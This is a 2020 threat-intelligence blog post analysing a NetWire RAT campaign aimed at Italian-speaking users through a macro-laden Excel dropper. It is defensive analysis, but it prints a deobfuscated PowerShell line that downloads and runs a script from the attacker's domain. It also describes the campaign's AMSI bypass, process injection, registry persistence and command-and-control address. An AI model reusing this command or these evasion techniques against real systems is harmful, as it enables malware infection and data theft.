Pierluigi Paganini
June 05, 2020
Info stealer malware confirms to be one of the most adopted weapons of cyber actors. One of them is Netwire (MITRE S0198), a multiplatform remote administration tool (RAT) that has been used by criminals and espionage groups at least since 2012.
During our Cyber Threat Intelligence monitoring we spotted a particular Office document weaponized to deliver such kind of malicious tool, uncovering a hidden malicious campaign designed to target Italian speaking victims. The particular chain of attack we discovered showed interesting technical patterns resembling other previous activities targeting the Italian manufacturing landscape, for this reason, we decided to dig deeper.
The variant used in this campaign is similar to other samples of the NetWire malware family but has an evolution of the attack chain. The following picture reports the NetWire infection chain used in this campaign:
Figure 1: Infection Chain
This NetWire campaign is delivered as a malicious email attachment with XML macro embedded into it. Following, the static information of the dropper:
| Hash | b7e95d0dcedd77ab717a33163af23ab2fd2dc6d07cdf81c5e4cfe080b0946b79 |
| Threat | XLSM document dropper |
| Size | 273 KB (279.577 byte) |
| Filetype | Microsoft Excel Macro Activation Sheet |
| Brief Description | NetWire XLSM Document Dropper with malicious macros embedded into it |
| Ssdeep | 6144:LBm/nRdmLKd+le81QPBkmmZBHlSUDIUxOW9c8oactq:KnHmLsgenklZBDkUgWD1cI |
Table 1: Static information about the sample
Once opened, the Excel document looks like a document with some dynamic elements but hasn’t some clickable buttons. There, the classical security notice informs us that macros are contained in the document and are disabled.
Figure 2: Overview of the malicious document
The macro contained inside the document is quite minimal and does not contain dead code or other anti-analysis technique, a part of the random looking variable naming.
Figure 3: Extracted Macro
The VBS macro snippet contacts the “cloudservices-archive.]best” domain in order to download the next stage payload hidden inside a file named as picture file, but it is not a picture and neither an executable: it actually is a XSL stylesheet containing Javascript able to load another ActiveX object.
Figure 4: Piece of the JS code
The obfuscation of this powershell command is straightforward to decode and the result is the following:
| ‘(&’+'(G’+’C’+’^#^’.replace(‘^#^’,’M’)+’ *W-‘+’O*)’+ ‘Ne’+’t.’+’W’+’eb’+’C’+’li’+’ent)’+’.D’+’ow’+’nl’+’oa’+’d’+’F’+’il’+’e(”http://cloudservices-archive.best/fiber[.]vbs”,$env:APPDATA+”\.vbs”)’|I`E`X;start-process($env:APPDATA+ ‘\.vbs’) |
Code Snippet 1
At this point, the malware tries to download the additional “fiber.vbs” file from the previous location, a small code snippet hiding powershell invocation through several nested replacements.
Figure 5: Piece of the downloaded VBS script
In fact, this time the code is heavily obfuscated and contains many string manipulation subroutines, but, once the result string is reconstructed, the abovementioned powershell reference becomes clearer.
Figure 6: Piece of the deobfuscated powershell payload
It actually contains another powershell stage designed to gain awareness of the execution environment and trigger the execution of an additional stage.
In this case, the malware downloads the “image01.jpg” file from the same domain of the previous stages. If the download is successful, the malware reads raw bytes from the downloaded file and transforms them into ready to execute powershell code. Here, two dynamically linked libraries are unpacked and prepared to be loaded in memory: one is for AMSI bypass and the oher is the final payload.
Code Snippet 4
The script also configures a persistence mechanism copying itself inside the directory “%APPDATA%\Local\Microsoft” and setting up the a registry key on “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”.
Figure 7: Deobfuscation of the command to prepare the persistence mechanism
Figure 8: Evidence of the persistence mechanism
The first of the two DLL embedded in the previous powershell snippets is actually used as a tool to bypass AMSI, the Microsoft’s AntiMalware Scan Interface. In particular, after its loading, the first method of this DLL run in the infection chain is the “[oioioi]::fdsfdf()” one.
Figure 9: Evidence of the Patching AmsiScanBuffer technique
The above figure shows how the trick is done: from the “Assembly Title” field it retrieves the two component, “amsi.dll” and “AmsiScanBufer”, required to reference the target method to patch to avoid payload detection at runtime.
Actually, the second DLL is not the final payload. It rather is another utility: a process injection utility used to hide the malware implant into other processes memory.
Figure 10: Evidence of the decompiled Injector module
As seen in the Code Snippet 4, the variable $MNB is passed as parameter on the invocation of the static method “CRASH”, in the “CASTLE” class. The other parameter is the target process where the injection takes place. This .NET compiled executable contains many references to the injection method used from the attacker. A piece of them is the following:
Figure 11: Evidence of the injection calls inside the code
The final payload was stored in the $MNB2 variable catched in the last powershell stage.
| Hash | 4E4001C6C47D09009EB24CE636BF5906 |
| Threat | NetWire executable |
| Size | 148.00 KB (151552 bytes) |
| Brief Description | Final payload of NetWire Rat |
| Ssdeep | 3072:2XFgYEAsB4+Cb3iiDUCcmE90rvPkGK+drboYMIFfS:2XGYEVat3iiDUCcf+rEG5+zIFf |
Table 2: Static information about the Netwire Payload
While analyzing the binary structure, we recovered the hardcoded IP address of the configured command and control server: 185.140.53.]48. A Belgian host operated by an anonymized services provider abused by this actor. The Netwire executable uses a self-decrypting routine to run its trojan modules, it allocates a new memory area and then decrypts the clean code as shown in the figure below.
Figure 12: Piece of the Self-Decrypting routine
Once decrypted, the malware saves its bot information into the registry key “HKCU\Software\Netwire”. At this point it was easy to spot the malicious functions characterizing Netwire RAT variants. To sum it up, Netwire RAT enables its operator to acquire sensitive information from victim machine, for instance by:
All the sensitive data acquired with this piece of malware, is then sent to the attacker command and control server, potentially enabling frauds and further network compromise.
Figure 13: Track of the set registry key
Figure 14: Complete Registry key
In this analysis, we described an attack designed to lure italian victims and deliver a piece of the so-called “commodity malware” with an intense code manipulation to avoid detection.
However, this particular kind of manipulation and obfuscation schema is not new to us. In fact, especially when dealing with the powershell stages, we noticed some variable and name structures was quite similar to one of our the last report about a recent Aggah Campaign insisting on the Italian Manufacturing industry.
The decoding function of the payloads is the same, despite the variable names. In addition, the variable names “$MNB” and “blindB” have been conserved. Potentially, this could also mean part of these techniques are reused by other actors insisting on the Italian landscape or also the Aggah actor is probing a different infection chain.
Figure 15: Similarities between Netwire campaign and Aggah Campaign
During the years, Netwire RAT gained lots of success and cyber actors adopted it to infect their victims, even state sponsored groups such as APT33 (Refined Kitten) and Gorgon Group included it in their arsenal, remembering us even the so-called commodity malware could represent a serious threat, especially when managed by experienced attackers able to re-package it to evade detection, leveraging consolidated operational practices to speed up cyber attacks.
The particular campaign we observed shows clear elements indicating the desired target of the attack are italian speaking. It also shows interesting similarities with techniques adopted during recent operations against italian manufacturing sector, that, even if unconfirmed, suggests there could still be low-footprint ongoing operations.
Additional details, including Indicators of Compromise (IoCs) and Yara Rules are available in the report published here:
| [adrotate banner=”9″] | [adrotate banner=”12″] |
(SecurityAffairs – Netwire, malware)
[adrotate banner=”5″]
[adrotate banner=”13″]
